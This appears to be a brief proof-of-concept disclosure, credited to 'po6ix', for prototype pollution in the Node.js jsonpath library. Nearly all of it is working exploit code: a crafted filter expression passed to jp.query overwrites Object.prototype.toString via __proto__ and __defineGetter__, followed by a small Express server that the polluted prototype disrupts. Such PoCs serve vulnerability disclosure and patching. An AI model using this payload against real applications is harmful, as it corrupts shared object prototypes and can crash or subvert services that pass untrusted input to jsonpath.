Prototype Pollution

[po6ix]

poc

var jp = require('jsonpath');
var data = [{}]
var names = jp.query(data, `$..[?( ({})['__proto__']['__defineGetter__']('toString', ({})['constructor']) )]`);

const express = require('express');
const app = express();

app.get('/', (req, res) => {
    res.end('working');
});

app.listen(8080);